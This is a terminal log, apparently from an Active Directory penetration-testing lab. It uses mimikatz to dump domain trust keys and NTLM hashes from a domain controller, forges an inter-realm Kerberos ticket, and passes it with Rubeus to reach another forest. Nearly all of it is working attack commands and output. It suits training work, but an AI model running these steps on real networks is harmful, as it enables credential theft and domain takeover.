PS C:\Windows\system32> $session = New-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local
PS C:\Windows\system32> Invoke-Command -Session $session -FilePath C:\AD\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Enter-PSSession -Session $session
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"lsadump::trust /patch"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)

[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/13/2024 9:05:32 PM - CLEAR - 2a 89 1d fb 1f 4e c3 5f 53 b7 79 2a 8a f1 fc ad 7f 1d 22
a0 24 25 01 2d f0 2e dd cb c1 9c 65 3c 3d a9 ba 00 2f 78 d4 dd 71 9b de d0 ab 14 c2 49 ac e8 dc
b8 2f 51 dc d8 e6 98 f2 0b 29 2f 1a b9 93 9b e0 c5 63 22 cf 39 f0 1c f4 27 cc 14 92 15 20 74 9b
38 32 86 eb 21 9b 98 a1 9b 03 a8 59 3d af ca 3c 88 4e 17 cd b1 29 9a 2c 9a 11 3e af 44 dd aa 03
76 01 3a f6 1a c4 ca 61 ee df 41 08 61 21 0b 3a 79 99 aa 89 9c 4e ca 42 79 c8 85 2a a6 18 36 6b
18 94 63 ce df cc 58 ff 95 81 d3 e9 e1 48 4a 85 2d c2 61 0a cd 2c b9 1a 58 a6 9c 9a 7d e4 b4 27
32 c1 df ee 48 90 03 35 fe 77 e6 97 37 6a 75 91 10 45 bc 91 29 69 db 9c 00 5a 06 e0 31 fe 44 17
c4 09 ec 7a 39 ca 46 b3 0f 8f d0 e9 39 e6 8d 2c 02 be 6b bd 2c c5 4b 13 a9 9d 14 43 e0
* aes256_hmac 09e60c921003dd4b72c5fbd63cb52aac316ef305e797a5b9d837c5a6134b310a
* aes128_hmac 7eea125ae826bb26dc8e273b6b8685b2
* rc4_hmac_nt a8f73b279dc7257c7a8a2d0c911043d2

[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 6/13/2024 9:01:43 PM - CLEAR - d9 10 c3 61 76 ff 36 ad e2 65 a8 d5 4e f3 84 92 b0 82 73
3d 5f 35 a0 ed 30 96 2d 39 64 c3 82 3b 16 0b af ae ae ff a4 77 05 2c f5 47 2a d6 77 a5 69 25 5a
a7 a7 e5 3f 4e 09 c7 e0 31 f4 e2 53 49 0e f2 e9 e3 1c 5a 7b d8 1d 06 9c 95 98 ea 38 2b 45 d3 76
be 15 d2 8b c3 31 38 06 fb ca 0f 36 c1 de b1 a2 df 3a 05 4e 14 e4 17 04 57 81 18 06 77 ef 6d da
bb e3 60 42 ce 53 d7 a4 31 31 d8 98 05 06 e4 5a af bb dc e4 5c ff f1 43 46 9a aa 08 90 4b 25 35
5e 5d 48 21 eb 44 f3 33 bc 4f 03 d5 fc 69 29 b7 de 2b ad 9c 1c 73 a0 cc a5 79 e5 91 13 b3 d3 af
c8 fa 92 cc 6f 13 2f a1 7d d1 28 de ef 96 90 8f 6d 14 36 25 0a 4c af 57 ae 51 5d 9a 8e 26 90 02
12 64 85 1b 28 9f 72 1c 49 b0 90 92 a0 b7 88 69 b7 96 87 bf 00 a4 a4 b2 35 fa 57 c7 8e
* aes256_hmac 574a1d8ebb609f51bb9028d6c47edd340c5076be83d1336f877e9fc209ffa637
* aes128_hmac c2b6e81c3d0b8e91df418a3a32d1132f
* rc4_hmac_nt 170847fffcf86c9d2dcc4c45cc734e2b

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL


* 5/3/2024 9:05:28 PM - CLEAR - 40 1f 1d 77 a1 92 53 70 df 55 ca 73 b4 c6 8c b7 c2 ed 76 f0
cd ac f9 82 f7 09 01 aa ad 62 62 a9 0a 81 a5 73 9d ff 02 dd 13 ce 65 74 5b 4a b9 ec 91 1d e7 bc
c3 45 93 05 79 a9 e7 58 9a a0 d0 46 2a 9d 33 1e 09 bb 51 a5 76 15 57 d0 db e0 5c 45 38 c7 93 57
b2 1d cf 14 c4 c7 48 f7 8d a7 53 31 12 4a 53 b6 45 a7 4c 9b 19 d5 c9 f6 e0 da 4f 01 d6 a1 6e 0b
2f 79 c2 49 95 61 81 da 67 d2 b6 7f ff 86 8a d8 5f 3a 99 49 62 be 6b 5a 31 29 b7 4e d4 2c a3 29
01 c7 94 86 8a 2c 5f 8e 76 f7 97 d3 7d c6 60 0a 66 9d 24 a5 9a 90 9b 3b 85 4a 89 b3 b0 6c e5 78
6a c2 08 27 e4 84 09 f9 f3 d9 f4 ec f6 35 f2 c2 9a 7b 4c 5d 7d 90 09 77 dd 60 6c 2b 06 01 0f d8
18 34 94 d7 4a a5 0f 5d 63 a4 7e a6 6a 14 f2 74 ba 75 1d 4d d0 36 fc ba 24 80 a8 6d
* aes256_hmac 55857d0270aa7dddf35db46932d75b53a8520c36ea3782ccd3403249e8f74786
* aes128_hmac a915717424b3d2b8630c55e5faf748e7
* rc4_hmac_nt 692acf0a13b6446ee4898339932172be

[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 6/13/2024 9:01:43 PM - CLEAR - b8 a3 df 9c 39 7f c3 9f b9 de 9d 68 85 9b 4b c3 bc ca 63
2e df fc b1 db 5d 1f 18 5d 3e 9d 15 2f b6 68 b9 a4 7f ea 29 88 de 6f b3 ac cb fc 22 01 bd c3 c9
88 f5 05 d2 35 41 50 6c b9 1d ff 86 ee 02 75 9f 00 25 33 5d 43 c6 fb d5 42 d0 74 31 27 42 49 35
20 af 04 fe 13 21 81 78 2c 63 0c 8f c9 c0 ce 8e 94 08 92 8c 48 4c 30 36 5a 11 20 f5 70 d3 d0 a5
fa 43 df 1b db 57 da 5f 62 56 d5 83 71 07 eb 96 ba cc 5b bf 5f 42 08 5d 9f 7a fb 99 de 8d 8e 62
25 9a 39 0c 7e d2 4d a2 e7 1d 05 45 d2 ca 76 86 29 ad 33 24 fb 00 28 02 a2 0b d7 27 c8 c2 26 2c
66 bb e3 16 5a 00 98 a6 42 21 0c 24 71 08 57 3d 85 15 a8 ea d4 e3 f1 db 65 81 a4 ea fe 80 a0 24
34 03 7e 52 1a d0 22 ef c9 da 89 10 60 9b ca 0d 5e c6 e2 15 02 a9 d3 3a 51 a6 3f 3d 51
* aes256_hmac ca5dc3eec2614f058b015bca83b1bd630f1ce43f9dc260e024f601a77a9f07fb
* aes128_hmac 8bf703993346b04723ae9267c7ca3593
* rc4_hmac_nt 757d0a697d2c7eaf3ea5137543430a22

Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)


[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 7/4/2024 10:15:48 PM - CLEAR - f1 35 9f f2 23 65 cc 38 ca 58 07 ba 63 77 8a 7f f9 22 5e
1d 44 60 f3 4f bb f7 6d 34
* aes256_hmac 959b6de34a906beaa60287501752c3e92bd2c023c1ede99c52cddc0cfcefe3d0
* aes128_hmac 20de3e8ffd6e7261fbe4377090b9518f
* rc4_hmac_nt b6180443e64c3dd466720bd52d6e34c8

[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 7/4/2024 10:15:48 PM - CLEAR - f1 35 9f f2 23 65 cc 38 ca 58 07 ba 63 77 8a 7f f9 22 5e
1d 44 60 f3 4f bb f7 6d 34
* aes256_hmac 4a8999f170c512287d3a38ae189979efec201c2284109044c41f101de16b2e04
* aes128_hmac c8ea862d96573709bd90422ed086e7a2
* rc4_hmac_nt b6180443e64c3dd466720bd52d6e34c8

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL


* 7/4/2024 10:02:26 PM - CLEAR - 02 0b 6d a3 b1 07 75 3b 95 c6 25 bb ae c0 71 56 60 fb 62
19 7b 05 e8 c3 74 c8 fa 77
* aes256_hmac dc168477d9529968ead900a4dae204c9d0248efa31ffd9e194d8cc9a4a77b8eb
* aes128_hmac 88b33d5c90887e92dd813aba570cc339
* rc4_hmac_nt cb5e22c0feb4155f6ee613b166326023

[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 7/4/2024 10:02:26 PM - CLEAR - 02 0b 6d a3 b1 07 75 3b 95 c6 25 bb ae c0 71 56 60 fb 62
19 7b 05 e8 c3 74 c8 fa 77
* aes256_hmac 692420fb85e3f9b44f4afe16bc04372f7785be6ca171495eb92c0708bd6e1892
* aes128_hmac c14d8ecb6afe8ac90e9733ca45f04479
* rc4_hmac_nt cb5e22c0feb4155f6ee613b166326023

Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)


[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 7/4/2024 10:15:46 PM - CLEAR - 02 8e 95 d2 14 bd 34 4e 91 09 ba e6 94 82 36 c4 b9 e7 9b
68 42 95 ba a4 cc 95 ce 3c
* aes256_hmac bbaaba4dd07e4db16ac76cf9fdba00984894bd0a0591ae6c902bef7b8a6c3f78
* aes128_hmac c9884fa0dd0f0c3702db86ce4147570b
* rc4_hmac_nt feddedccad840cd0e5c912cb1f860b35

[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 7/4/2024 10:15:46 PM - CLEAR - 02 8e 95 d2 14 bd 34 4e 91 09 ba e6 94 82 36 c4 b9 e7 9b
68 42 95 ba a4 cc 95 ce 3c
* aes256_hmac fd4b5e51cebe2c14b7c55b3eb1d1b1e9d56957bf55fec8c10615846f37050604
* aes128_hmac fd944689405dd272bb04d5876be5d873
* rc4_hmac_nt feddedccad840cd0e5c912cb1f860b35

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL


* 7/4/2024 10:02:21 PM - CLEAR - b6 f5 d2 4c 42 22 3f 58 a2 e7 95 c4 bf c2 61 68 be 5b 7a
85 f3 b5 0a 07 f8 fd 29 29
* aes256_hmac d2fddfe77b5051a38ceae331d748ae084b95349d22f2e7965496ad683a3e3ee6
* aes128_hmac 681c0ef5125d2e6a8e72297e3903cea8
* rc4_hmac_nt 10b5b23f42f792c66e2277be14f4b55d

[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 7/4/2024 10:02:21 PM - CLEAR - b6 f5 d2 4c 42 22 3f 58 a2 e7 95 c4 bf c2 61 68 be 5b 7a
85 f3 b5 0a 07 f8 fd 29 29
* aes256_hmac cfd028f8bb22b9b250b0c2b8dc8a76a492f40947d5912c55d34e333c29893729
* aes128_hmac cf41ee77f4dc7e04cd59fb54f4b06a90
* rc4_hmac_nt 10b5b23f42f792c66e2277be14f4b55d

lsadump::lsa /patch
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"lsadump::lsa /patch"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch


Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID : 000001f4 (500)


User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID : 000001f5 (501)


User : Guest
LM :
NTLM :

RID : 000001f6 (502)


User : krbtgt
LM :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID : 00000459 (1113)


User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID : 0000045a (1114)


User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID : 0000045b (1115)


User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID : 0000045d (1117)


User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7

RID : 0000045e (1118)


User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8

RID : 0000045f (1119)


User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID : 00000460 (1120)


User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID : 00000461 (1121)


User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d

RID : 00000462 (1122)


User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6
RID : 00001055 (4181)
User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID : 00003521 (13601)


User : student161
LM :
NTLM : 12fe951ecdce0ee2edd5a4d71a0d6e0b

RID : 00003522 (13602)


User : student162
LM :
NTLM : 2230beda3bcd55b72cc4c1a5ef8170e9

RID : 00003523 (13603)


User : student163
LM :
NTLM : ccbca8c20310dbc0c5c9dcf1fde108b8

RID : 00003524 (13604)


User : student164
LM :
NTLM : 55e3baaf40c19d73f46b601d3cbfd41b

RID : 00003525 (13605)


User : student165
LM :
NTLM : a42ea87cc59018a3b49ec5d9be31a646

RID : 00003526 (13606)


User : student166
LM :
NTLM : 24b141d31352ea4f12745579e4885756

RID : 00003527 (13607)


User : student167
LM :
NTLM : 5ea118645828dcab565bf5895ca4ea57

RID : 00003528 (13608)


User : student168
LM :
NTLM : 53171b516f11d8b38e9fb0572014ba55

RID : 00003529 (13609)


User : student169
LM :
NTLM : 5a231022659299b4a1f2d1651d1c5106

RID : 0000352a (13610)


User : student170
LM :
NTLM : 9b0a73646f1fab4f0321f4526f3ed8f1

RID : 0000352b (13611)


User : student171
LM :
NTLM : 83c26fe5a55558897267fdf9a0d91d0d
RID : 0000352c (13612)
User : student172
LM :
NTLM : 1c0175bcef53648c75a88d566d2df3da

RID : 0000352d (13613)


User : student173
LM :
NTLM : de2a9206f558dddf3ded7b5f3427182c

RID : 0000352e (13614)


User : student174
LM :
NTLM : 6c22f89d3c33d5d260f195be679212b3

RID : 0000352f (13615)


User : student175
LM :
NTLM : 2c102014852ffa9959434ac02dc0fecd

RID : 00003530 (13616)


User : student176
LM :
NTLM : a8918ce94dcd39974537493be3a4895c

RID : 00003531 (13617)


User : student177
LM :
NTLM : d348e38df9c4883b5f234d83deb038f3

RID : 00003532 (13618)


User : student178
LM :
NTLM : cc4f8e304a59ed00c47a87d42b7c107f

RID : 00003533 (13619)


User : student179
LM :
NTLM : 667598cfb79b5ca955c70afba1606ee2

RID : 00003534 (13620)


User : student180
LM :
NTLM : 2e893c9e2619ca18f0560e732c573eb9

RID : 00003535 (13621)


User : Control161user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003536 (13622)


User : Control162user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003537 (13623)


User : Control163user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003538 (13624)


User : Control164user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003539 (13625)


User : Control165user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353a (13626)


User : Control166user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353b (13627)


User : Control167user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353c (13628)


User : Control168user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353d (13629)


User : Control169user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353e (13630)


User : Control170user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353f (13631)


User : Control171user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003540 (13632)


User : Control172user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003541 (13633)


User : Control173user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003542 (13634)


User : Control174user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003543 (13635)


User : Control175user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003544 (13636)


User : Control176user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003545 (13637)


User : Control177user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003546 (13638)


User : Control178user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003547 (13639)


User : Control179user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003548 (13640)


User : Control180user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003549 (13641)


User : Support161user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354a (13642)


User : Support162user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354b (13643)


User : Support163user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354c (13644)


User : Support164user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354d (13645)


User : Support165user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354e (13646)


User : Support166user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354f (13647)


User : Support167user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003550 (13648)


User : Support168user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003551 (13649)


User : Support169user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003552 (13650)


User : Support170user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003553 (13651)


User : Support171user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003554 (13652)


User : Support172user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003555 (13653)


User : Support173user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003556 (13654)


User : Support174user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003557 (13655)


User : Support175user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003558 (13656)


User : Support176user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003559 (13657)


User : Support177user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355a (13658)


User : Support178user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000355b (13659)
User : Support179user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355c (13660)


User : Support180user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355d (13661)


User : VPN161user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355e (13662)


User : VPN162user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355f (13663)


User : VPN163user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003560 (13664)


User : VPN164user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003561 (13665)


User : VPN165user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003562 (13666)


User : VPN166user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003563 (13667)


User : VPN167user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003564 (13668)


User : VPN168user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003565 (13669)


User : VPN169user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003566 (13670)


User : VPN170user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003567 (13671)
User : VPN171user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003568 (13672)


User : VPN172user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003569 (13673)


User : VPN173user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356a (13674)


User : VPN174user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356b (13675)


User : VPN175user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356c (13676)


User : VPN176user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356d (13677)


User : VPN177user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356e (13678)


User : VPN178user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356f (13679)


User : VPN179user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003570 (13680)


User : VPN180user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 000003e8 (1000)


User : DCORP-DC$
LM :
NTLM : 81a9ccc2f44b988af78448ad78297ad5

RID : 00000451 (1105)


User : DCORP-ADMINSRV$
LM :
NTLM : b5f451985fd34d58d5120816d31b5565

RID : 00000452 (1106)


User : DCORP-APPSRV$
LM :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID : 00000453 (1107)


User : DCORP-CI$
LM :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID : 00000454 (1108)


User : DCORP-MGMT$
LM :
NTLM : 0878da540f45b31b974f73312c18e754

RID : 00000455 (1109)


User : DCORP-MSSQL$
LM :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID : 00000456 (1110)


User : DCORP-SQL1$
LM :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID : 0000106a (4202)


User : DCORP-STDADMIN$
LM :
NTLM : 323e49189b1edbea4a323142017328cb

RID : 00003571 (13681)


User : DCORP-STD161$
LM :
NTLM : 9ef9daa7b4bc99ab3e4121f2abd037c7

RID : 00003572 (13682)


User : DCORP-STD162$
LM :
NTLM : 36cc733a53e75d0cbd53e0fe7731e716

RID : 00003573 (13683)


User : DCORP-STD163$
LM :
NTLM : 75e1e5ec9a9f15290d40cd1b04fede35

RID : 00003574 (13684)


User : DCORP-STD164$
LM :
NTLM : 34575ea235cdfb2fad121301f59a4a2d

RID : 00003575 (13685)


User : DCORP-STD165$
LM :
NTLM : 565d99510bbbe8fb3e4fa5c9c2120bc5

RID : 00003576 (13686)


User : DCORP-STD166$
LM :
NTLM : 1ab7d20a96b7b4b34e0c806b7631ad8e

RID : 00003577 (13687)


User : DCORP-STD168$
LM :
NTLM : 313fc2c203e17c1a63554c88e090c205

RID : 00003578 (13688)


User : DCORP-STD167$
LM :
NTLM : 69a450cb407f22862f946f22d20db2c2

RID : 00003579 (13689)


User : DCORP-STD169$
LM :
NTLM : ceeab9f5c7798eb9034512934ec115a8

RID : 0000357a (13690)


User : DCORP-STD170$
LM :
NTLM : 1d24dfc4057c69f71576c0cc1e862a17

RID : 0000357b (13691)


User : DCORP-STD171$
LM :
NTLM : 84d9394ef97f221290f257059e8086d0

RID : 0000357c (13692)


User : DCORP-STD172$
LM :
NTLM : 49cc46d9ea5e322232497c21f808ff88

RID : 0000357d (13693)


User : DCORP-STD173$
LM :
NTLM : b94c3a7d1f129098c1b7968b5db44807

RID : 0000357e (13694)


User : DCORP-STD174$
LM :
NTLM : b642781c290b8550a2e9b2661cf87654

RID : 0000357f (13695)


User : DCORP-STD175$
LM :
NTLM : 57f3d186ece9047624b82015fab8d00e

RID : 00003580 (13696)


User : DCORP-STD176$
LM :
NTLM : 79207f3a25b685aa97ea1b34aef53fef

RID : 00003581 (13697)


User : DCORP-STD177$
LM :
NTLM : 2979ebc70dd459e65f8ac3e998aed6b1

RID : 00003582 (13698)


User : DCORP-STD178$
LM :
NTLM : 956164515f0459ea114452437d5ea4d7

RID : 00003583 (13699)


User : DCORP-STD180$
LM :
NTLM : 459c493625fe5994ff309debff15f163

RID : 00003584 (13700)


User : DCORP-STD179$
LM :
NTLM : c9b2183c974b57b61d873026a4443688

RID : 0000044f (1103)


User : mcorp$
LM :
NTLM : a8f73b279dc7257c7a8a2d0c911043d2

RID : 00000450 (1104)


User : US$
LM :
NTLM : b6180443e64c3dd466720bd52d6e34c8

RID : 00000458 (1112)


User : ecorp$
LM :
NTLM : feddedccad840cd0e5c912cb1f860b35

Forging Inter-Realm TGT


With the trust key obtained above, we forge an inter-realm TGT. For an inter-forest trust there is no point in injecting extra SIDs, since SID filtering on the trust would strip them.
C:\Windows\system32>C:\AD\Tools\Old_tools\BetterSafetyKatz.exe "kerberos::golden
/user:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /rc4:feddedccad840cd0e5c912cb1f860b35 /service:krbtgt /target:eurocorp.local
/ticket:C:\Users\student163\Desktop\shared\trustticket_Forest.kirbi" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:administrator /domain:dollarcorp.moneycorp.local


/sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:feddedccad840cd0e5c912cb1f860b35
/service:krbtgt /target:eurocorp.local
/ticket:C:\Users\student163\Desktop\shared\trustticket_Forest.kirbi
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: feddedccad840cd0e5c912cb1f860b35 - rc4_hmac_nt
Service : krbtgt
Target : eurocorp.local
Lifetime : 7/5/2024 1:27:54 AM ; 7/3/2034 1:27:54 AM ; 7/3/2034 1:27:54 AM
-> Ticket : C:\Users\student163\Desktop\shared\trustticket_Forest.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgs
/ticket:"C:\Users\student163\Desktop\shared\trustticket_forest.kirbi" /service:cifs/eurocorp-
dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.local'
[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

doIFjjCCBYqgAwIBBaEDAgEWooIEcDCCBGxhggRoMIIEZKADAgEFoRAbDkVVUk9DT1JQLkxPQ0FMoi0w
K6ADAgECoSQwIhsEY2lmcxsaZXVyb2NvcnAtZGMuZXVyb2NvcnAubG9jYWyjggQaMIIEFqADAgESoQMC
AQ2iggQIBIIEBHEjvdqz5K3g72AvIT30kHG6jCBUoasNTBthnbmL4tV/bGtrmLCz3gK9HjVVau6nmCRD
ol69q2skbQo0TWs2cegJEDOu9fRxyx+8LaljOURCl7olWUzg67QplByDggUzWmtHXdXyoYbo1d+b0GXW
ejtbJOjmhOrQeBNjk0ppSV0i2ysH2Lx50r1McyZraDiY0RCjcLvoDEBMvwWb5yfA9MJl7ICYikyxo3ze
2Mrf4YaG85y8gxauLyhaNznxXOanyRrbzMp6GY7nLR2dAK5KzBsCHcvSCEmek1Ko39zZWExbu8lZmAZ3
kRzkNaKuA0N+/qWRKYAOzmhFne/6m8ZSoc/pRUqPOvMBbnavoAWuWzTPDa+CGpwGb8d5pG+s6UHv+ha6
wd3Yi0zomjNpvH/Kb1sKdRyySqCYfBTkv2AQwu6SfIhxenkukGaXXzqihT2pipnDmbTloh11xDo//Q0L
/CfBeEyoyusXuEp7yfkm6LpUUs6ZV9pQXhv8UAbZjw4ySmWmDVmWbiA+U0U/oqIqk8HxFwC7uQXyADoR
9IyzQvjPa8H95t6/nUSZiNmb4fUWZ/YYogajNK3ZTS2R5Y/zPD7hgqY7Tf0zIwUICxKN5uIZsg6xyByj
to2MSkITGO3DQJNufR7Im2eeQ+yi7L+fN+lZ/ZBh3YZFzbzRBKUckya1y6C2iwFuPQ1gmX9QSTOV9b1O
